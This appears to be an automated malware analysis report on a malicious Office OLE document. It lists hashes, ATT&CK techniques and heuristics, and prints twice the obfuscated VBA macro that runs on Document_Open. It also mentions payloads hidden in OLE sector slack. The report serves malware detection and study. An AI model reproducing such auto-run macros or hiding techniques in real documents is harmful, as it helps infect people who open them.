Office (OLE) malware analysis — malicious · 8a79795557db8f7f

MALICIOUS

Office (OLE)

62.3 KB First seen: 2019-05-16

MD5: 8e78461109427fe0b137b5cde7332eff SHA-1: cd90848984108cec500dd13ba3588fbe7baa755a SHA-256: 8a79795557db8f7faee96dac57a44daa3198c77570c2443c74d8dfda9746dcc6

102 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an OLE document containing VBA macros, with a high-confidence heuristic indicating the presence of a Document_Open macro. The VBA code is heavily obfuscated, making its exact function difficult to determine, but it is designed to execute upon opening the document. This suggests an attempt to download and execute a secondary payload, characteristic of a malicious document delivered via spearphishing.

Heuristics 4

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 63,783 bytes but its declared streams total only 36,254 bytes — 27,529 bytes (43%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1544 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1544 bytes
SHA-256: `bd17f884dd9e35a9c31e390daa8f8d0ce75f25da5d777b2571899e9a63bc6350`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "VkUNSMIFcHli" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() If BbIjW < GEOwND Then Dim mWYjB() RnvfU = MkUlqk + TZUucl + iYRIcr + RidrKo End If If YYKaX > joQqBS Then Dim iUFbUw() jhYqZ = IuJZUf + KNvaFw + ziDHr + wTrzJ EZirA = Bhamf + VVkSRZ + WXZEwi + zPrpD End If If dFwnAJ And lSYMi Then Dim nRbwuF() tVnCdl = Grufww + wOwol + UmzkQM + dMBvQ End If If AIStKP Xor 9 Then Dim CuYsP() KrCdHJ = SGVCm + ZSuqw + NBYnw + dVYRs rAhBmJ = nGPiu + PHupvI End If If CdlDGY < nuAOuK Then Dim jYfkSK() wXiBj = jjdJoB + wDPjC End If If SVdfr Or 11 Then Dim VKRPX() PSEGHB = atHQra + vnfIwi Aqctw = bcZON + CmwuwH End If If YQLEmF <= JhfJTp Then Dim OcbNJ() wwUsDG = HwtjA + GujfY + tMSvt + uvkXU End If PdXuwnNPRQVh (LvzrE + umFKBXFism + jMXcV + hVVcOoBDGK + owPoDAlrnI + WwNaIf + JhPzAwQ + AAmvj + IAFhYCiI + juDbOdtXPJz + pdawSBji + nvIDj) If FOPavC > 6 Then Dim LEKBmj() iCYdsp = WWOaBW + QbFZDB + qszzZA + tOqTb End If If zXVfs <> vGjMv Then Dim iGCrk() jEIYuc = SwZrGK + SOfwR End If If wCGPij < anIKm Then Dim daABZc() nMWaK = HHwwq + NsXPc End If If MGTZrD <= rAAtfA Then Dim dEbjhU() JbdToT = IYHauA + VmAMz + wszFuA + QKOkt ACiqF = kEjcs + lArIS End If End Sub

SHA-256: bd17f884dd9e35a9c31e390daa8f8d0ce75f25da5d777b2571899e9a63bc6350

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "VkUNSMIFcHli"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
   If BbIjW < GEOwND Then

Dim mWYjB()
RnvfU = MkUlqk + TZUucl + iYRIcr + RidrKo

End If
   If YYKaX > joQqBS Then

Dim iUFbUw()
jhYqZ = IuJZUf + KNvaFw + ziDHr + wTrzJ
EZirA = Bhamf + VVkSRZ + WXZEwi + zPrpD

End If
   If dFwnAJ And lSYMi Then

Dim nRbwuF()
tVnCdl = Grufww + wOwol + UmzkQM + dMBvQ

End If
   If AIStKP Xor 9 Then

Dim CuYsP()
KrCdHJ = SGVCm + ZSuqw + NBYnw + dVYRs
rAhBmJ = nGPiu + PHupvI

End If
   If CdlDGY < nuAOuK Then

Dim jYfkSK()
wXiBj = jjdJoB + wDPjC

End If
   If SVdfr Or 11 Then

Dim VKRPX()
PSEGHB = atHQra + vnfIwi
Aqctw = bcZON + CmwuwH

End If
   If YQLEmF <= JhfJTp Then

Dim OcbNJ()
wwUsDG = HwtjA + GujfY + tMSvt + uvkXU

End If
PdXuwnNPRQVh (LvzrE + umFKBXFism + jMXcV + hVVcOoBDGK + owPoDAlrnI + WwNaIf + JhPzAwQ + AAmvj + IAFhYCiI + juDbOdtXPJz + pdawSBji + nvIDj)
   If FOPavC > 6 Then

Dim LEKBmj()
iCYdsp = WWOaBW + QbFZDB + qszzZA + tOqTb

End If
   If zXVfs <> vGjMv Then

Dim iGCrk()
jEIYuc = SwZrGK + SOfwR

End If
   If wCGPij < anIKm Then

Dim daABZc()
nMWaK = HHwwq + NsXPc

End If
   If MGTZrD <= rAAtfA Then

Dim dEbjhU()
JbdToT = IYHauA + VmAMz + wszFuA + QKOkt
ACiqF = kEjcs + lArIS

End If
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.